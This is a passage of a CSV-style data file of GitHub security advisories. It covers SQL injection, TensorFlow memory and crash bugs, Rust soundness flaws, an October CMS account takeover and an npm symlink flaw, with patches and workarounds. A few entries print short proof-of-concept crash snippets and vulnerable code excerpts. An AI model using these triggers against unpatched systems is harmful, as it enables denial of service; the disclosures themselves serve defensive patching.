'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:54:14Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}"
+1.4.0,GHSA-r7cj-8hjg-x622,2021-12-16T14:11:44Z,2021-11-16T17:25:57Z,,['CVE-2021-43608'],DBAL 3 SQL Injection Security Vulnerability,"We have released a new version Doctrine DBAL 3.1.4 that fixes a critical SQL injection vulnerability in the LIMIT clause generation API provided by the Platform abstraction.
+
+We advise everyone using Doctrine DBAL 3.0.0 up to 3.1.3 to upgrade to 3.1.4 immediately.
+
+The vulnerability can happen when unsanitized input is passed to many APIs in Doctrine DBAL and ORM that ultimately end up calling `AbstractPlatform::modifyLimitQuery`.
+
+As a workaround you can cast all limit and offset parameters to integers before passing them to Doctrine APIs.
+
+This vulnerability has been assigned [CVE-2021-43608](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43608).
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'doctrine/dbal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/doctrine/dbal/security/advisories/GHSA-r7cj-8hjg-x622'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43608'}, {'type': 'WEB', 'url': 'https://github.com/doctrine/dbal/commit/9dcfa4cb6c03250b78a84737ba7ceb82f4b7ba4d'}, {'type': 'PACKAGE', 'url': 'https://github.com/doctrine/dbal/'}, {'type': 'WEB', 'url': 'https://github.com/doctrine/dbal/releases'}, {'type': 'WEB', 'url': 'https://www.doctrine-project.org/2021/11/11/dbal3-vulnerability-fixed.html'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:34:32Z', 'nvd_published_at': '2021-12-09T20:15:00Z'}"
+1.4.0,GHSA-93g4-3phc-g4xw,2021-11-03T14:48:56Z,2021-11-03T17:30:18Z,,['CVE-2021-27644'],SQL injection in Apache DolphinScheduler ,"In Apache DolphinScheduler before 1.3.6 versions, authorized users can use SQL injection in the data source center. (Only applicable to MySQL data source with internal login account password)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dolphinscheduler:dolphinscheduler-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27644'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6%40%3Cdev.dolphinscheduler.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6@%3Cdev.dolphinscheduler.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/01/3'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T18:48:35Z', 'nvd_published_at': '2021-11-01T10:15:00Z'}"
+1.4.0,GHSA-x3v8-c8qx-3j3r,2021-11-08T22:22:42Z,2021-11-10T18:57:45Z,,['CVE-2021-41215'],Null pointer exception in `DeserializeSparse`,"### Impact
+The [shape inference code for `DeserializeSparse`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/sparse_ops.cc#L152-L168) can trigger a null pointer dereference:
+
+```python
+import tensorflow as tf
+
+dataset = tf.data.Dataset.range(3)
+
+@tf.function
+def test():
+ y = tf.raw_ops.DeserializeSparse(
+ serialized_sparse=tf.data.experimental.to_variant(dataset),
+ dtype=tf.int32)
+
+test()
+```
+
+This is because the shape inference function assumes that the `serialize_sparse` tensor is a tensor with positive rank (and having `3` as the last dimension). However, in the example above, the argument is a scalar (i.e., rank 0).
+
+### Patches
+We have patched the issue in GitHub commit [d3738dd70f1c9ceb547258cbb82d853da8771850](https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x3v8-c8qx-3j3r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41215'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:22:42Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-wqxc-qrq4-w5v4,2022-06-15T19:41:46Z,2021-08-25T21:01:33Z,,['CVE-2020-36213'],Update unsound DrainFilter and RString::retain,"An issue was discovered in the abi_stable crate before 0.9.1 for Rust. A retain call can create an invalid UTF-8 string, violating soundness.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'abi_stable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36213'}, {'type': 'WEB', 'url': 'https://github.com/rodrimati1992/abi_stable_crates/issues/44'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0105.html'}]","{'cwe_ids': ['CWE-172'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:18:54Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}"
+1.4.0,GHSA-cfpj-3q4c-jhvr,2021-08-24T16:24:24Z,2021-08-25T14:40:38Z,,['CVE-2021-37680'],Division by zero in TFLite,"### Impact
+The implementation of fully connected layers in TFLite is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/fully_connected.cc#L226):
+
+```cc
+const int batch_size = input_size / filter->dims->data[1];
+```
+
+An attacker can craft a model such that `filter->dims->data[1]` is 0.
+
+### Patches
+We have patched the issue in GitHub commit [718721986aa137691ee23f03638867151f74935f](https://github.com/tensorflow/tensorflow/commit/718721986aa137691ee23f03638867151f74935f).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360. Concurrently, it has also been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cfpj-3q4c-jhvr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37680'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/718721986aa137691ee23f03638867151f74935f'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T16:24:24Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}"
+1.4.0,GHSA-cmhx-cq75-c4mj,2023-02-21T18:57:08Z,2021-08-04T21:03:46Z,,['CVE-2019-0820'],Regular Expression Denial of Service in System.Text.RegularExpressions,"A denial of service vulnerability exists when .NET Framework and .NET Core improperly process RegEx strings, aka '.NET Framework and .NET Core Denial of Service Vulnerability'. This CVE ID is unique from CVE-2019-0980, CVE-2019-0981.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.Text.RegularExpressions'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0820'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:1259'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0820'}]","{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-04T21:03:27Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-gf93-h79q-6jjv,2023-06-13T21:57:16Z,2021-08-25T20:45:41Z,,['CVE-2019-25006'],Incorrect implementation of the Streebog hash functions in streebog,Internal update-sigma function was implemented incorrectly and depending on debug-assertions it could've caused an incorrect result or panic for certain inputs.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'streebog'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25006'}, {'type': 'WEB', 'url': 'https://github.com/RustCrypto/hashes/pull/91'}, {'type': 'PACKAGE', 'url': 'https://github.com/RustCrypto/hashes/tree/master/streebog'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0030.html'}]","{'cwe_ids': ['CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6gvc-4jvj-pwq4,2021-09-27T15:46:50Z,2021-08-30T16:22:34Z,,['CVE-2018-25001'],Use after free in libpulse-binding,An issue was discovered in the libpulse-binding crate before 2.5.0 for Rust. proplist::Iterator can cause a use-after-free. ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libpulse-binding'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.5'}, {'fixed': '2.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25001'}, {'type': 'PACKAGE', 'url': 'https://github.com/jnqnfe/pulse-binding-rust'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0020.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:05:15Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}"
+1.4.0,GHSA-3vv3-frrq-6486,2021-08-24T19:10:18Z,2021-08-25T20:59:20Z,,['CVE-2020-36432'],Use of Uninitialized Resource in alg_ds,"An issue was discovered in the alg_ds crate through 2020-08-25 for Rust. `Matrix::new()` internally calls `Matrix::fill_with()` which uses `*ptr = value` pattern to initialize the buffer. This pattern assumes that there is an initialized struct at the address and drops it, which results in dropping of uninitialized struct.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'alg_ds'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36432'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/dvshapkin/alg-ds'}, {'type': 'WEB', 'url': 'https://gitlab.com/dvshapkin/alg-ds/-/issues/1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0033.html'}]","{'cwe_ids': ['CWE-665', 'CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:22:58Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-r2x6-vrxx-jgv4,2023-06-13T18:34:57Z,2021-08-25T20:58:07Z,,['CVE-2020-36463'],Data races in multiqueue,"Affected versions of this crate unconditionally implemented Send for types used in queue implementations (InnerSend, InnerRecv, FutInnerSend, FutInnerRecv). This allows users to send non-Send types to other threads, which can lead to data race bugs or other undefined behavior.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'multiqueue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36463'}, {'type': 'WEB', 'url': 'https://github.com/schets/multiqueue/issues/31'}, {'type': 'PACKAGE', 'url': 'https://github.com/schets/multiqueue'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/multiqueue/RUSTSEC-2020-0143.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0143.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:19:09Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-3837-87vh-xq3w,2023-06-13T22:35:33Z,2021-08-25T20:57:07Z,,['CVE-2020-36447'],Data race in v9,"Affected versions of this crate unconditionally implement Sync for SyncRef. This definition allows data races if &T is accessible through &SyncRef.
+
+SyncRef derives Clone and Debug, and the default implementations of those traits access &T by invoking T::clone() & T::fmt(). It is possible to create data races & undefined behavior by concurrently invoking SyncRef::clone() or SyncRef::fmt() from multiple threads with T: !Sync.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'v9'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.43'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36447'}, {'type': 'WEB', 'url': 'https://github.com/purpleposeidon/v9/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/purpleposeidon/v9/commit/18847c50e5d36561cc91c996c3539ddb1eacf6c7'}, {'type': 'PACKAGE', 'url': 'https://github.com/purpleposeidon/v9'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/v9/RUSTSEC-2020-0127.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0127.html'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:31:57Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-mxr5-mc97-63rc,2022-07-05T18:06:21Z,2021-08-30T16:13:02Z,,['CVE-2021-32648'],Account Takeover in Octobercms,"### Impact
+
+An attacker can request an account password reset and then gain access to the account using a specially crafted request.
+
+- To exploit this vulnerability, an attacker must know the username of an administrator and have access to the password reset form.
+
+### Patches
+
+- Issue has been patched in Build 472 and v1.1.5
+- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)
+
+### Workarounds
+
+Apply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.
+
+[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.
+
+### Recommendations
+
+We recommend the following steps to make sure your server stays secure:
+
+- Keep server OS and system software up to date.
+- Keep October CMS software up to date.
+- Use a multi-factor authentication plugin.
+- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.
+- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.
+
+### References
+
+Bugs found as part of Solar Security CMS Research. Credits to:
+• Andrey Basarygin
+• Andrey Guzei
+• Mikhail Khramenkov
+• Alexander Sidukov
+• Maxim Teplykh
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/system'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.472'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'october/system'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.1'}, {'fixed': '1.1.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32648'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:14:45Z', 'nvd_published_at': '2021-08-26T19:15:00Z'}"
+1.4.0,GHSA-c676-mcw3-qg55,2021-08-27T12:48:30Z,2021-08-25T14:50:08Z,,['CVE-2021-3730'],firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3730'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/f80178b1b2b7864d17500a131d570c353c9a26f6'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ea181323-51f8-46a2-a60f-6a401907feb7'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T20:03:09Z', 'nvd_published_at': '2021-08-23T13:15:00Z'}"
+1.4.0,GHSA-gmw6-94gg-2rc2,2022-06-17T20:51:19Z,2021-08-31T16:03:34Z,,['CVE-2021-39135'],UNIX Symbolic Link (Symlink) Following in @npmcli/arborist,"### Impact
+
+Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
+
+`@npmcli/arborist`, the library that calculates dependency trees and manages the node_modules folder hierarchy for the npm command line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder.
+
+This is accomplished by extracting package contents into a project's `node_modules` folder.
+
+If the `node_modules` folder of the root project or any of its dependencies is somehow replaced with a symbolic link, it could allow Arborist to write package dependencies to any arbitrary location on the file system.
+
+Note that symbolic links contained within package artifact contents are filtered out, so another means of creating a `node_modules` symbolic link would have to be employed.
+
+1. A `preinstall` script could replace `node_modules` with a symlink. (This is prevented by using `--ignore-scripts`.)
+2. An attacker could supply the target with a git repository, instructing them to run `npm install --ignore-scripts` in the root. This may be successful, because `npm install --ignore-scripts` is typically not capable of making changes outside of the project directory, so it may be deemed safe.
+
+### Patches
+
+2.8.2 (included in npm v7.20.7 and above)
+
+### Workarounds
+
+Do not run `npm install` on untrusted codebases, without first ensuring that the `node_modules` directory in the project is not a symbolic link.
+
+### Fix
+
+Prior to extracting any package contents, the `node_modules` folder into which it is extracted is verified to be a real directory. If it is not, then it is removed.
+
+Caveat: if you are currently relying on creating a symbolic link to the `node_modules` folder in order to share dependencies between projects, then that will no longer be possible. Please use the `npm link` command, explicit `file:...` dependencies, and/or `workspaces` to share dependencies in a development environment.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@npmcli/arborist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/arborist/security/advisories/GHSA-gmw6-94gg-2rc2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39135'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/arborist'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@npmcli/arborist'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-59', 'CWE-61'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T16:03:00Z', 'nvd_published_at': '2021-08-31T17:15:00Z'}"
+1.4.0,GHSA-64j8-7gp2-xjx5,2023-06-13T22:26:24Z,2021-08-25T20:50:28Z,,['CVE-2020-35924'],Data races in try-mutex,"Affected versions of this crate unconditionally implemented Sync trait for TryMutex type. This allows users to put non-Send T type in TryMutex and send it to another thread, which can cause a data race. The flaw was corrected in the 0.3.0 release by adding T: Send bound for the Sync trait implementation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'try-mutex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35924'}, {'type': 'WEB', 'url': 'https://github.com/mpdn/try-mutex/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/mpdn/try-mutex'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0087.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:54:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pp2h-95hm-hv9r,2021-08-27T12:49:12Z,2021-08-30T16:13:13Z,,['CVE-2021-37702'],Improper Neutralization of Formula Elements in a CSV File in pimcore/pimcore,"### Impact
+Data Object CSV import allows formular injection.
+
+### Patches
+Problem is patched in 10.1.1
+
+### Workarounds
+Apply https://github.com/pimcore/pimcore/pull/9992.patch
+
+### References
+https://cwe.mitre.org/data/definitions/1236.html
+",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-pp2h-95hm-hv9r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37702'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/9992'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:12:56Z', 'nvd_published_at': '2021-08-18T15:15:00Z'}"
+1.4.0,GHSA-c545-c4f9-rf6v,2021-08-24T17:15:34Z,2021-08-25T14:40:09Z,,['CVE-2021-37685'],Heap OOB in TFLite,"### Impact
+TFLite's [`expand_dims.cc`](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/expand_dims.cc#L36-L50) contains a vulnerability which allows reading one element outside of bounds of heap allocated data:
+
+```cc
+ if (axis < 0) {
+ axis = input_dims.size + 1 + axis;
+ }
+ TF_LITE_ENSURE(context, axis <= input_dims.size);
+
+ TfLiteIntArray* output_dims = TfLiteIntArrayCreate(input_dims.size + 1);
+ for (int i = 0; i < output_dims->size; ++i) {
+ if (i < axis) {
+ output_dims->data[i] = input_dims.data[i];
+ } else if (i == axis) {
+ output_dims->data[i] = 1;
+ } else {
+ output_dims->data[i] = input_dims.data[i - 1];
+ }
+ }
+```
+
+If `axis` is a large negative value (e.g., `-100000`), then after the first `if` it would still be negative. The check following the `if` statement will pass and the `for` loop would read one element before the start of `input_dims.data` (when `i = 0`).
+
+### Patches
+We have patched the issue in GitHub commit [d94ffe08a65400f898241c0374e9edc6fa8ed257](https://github.com/tensorflow/tensorflow/commit/d94ffe08a65400f898241c0374e9edc6fa8ed257).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
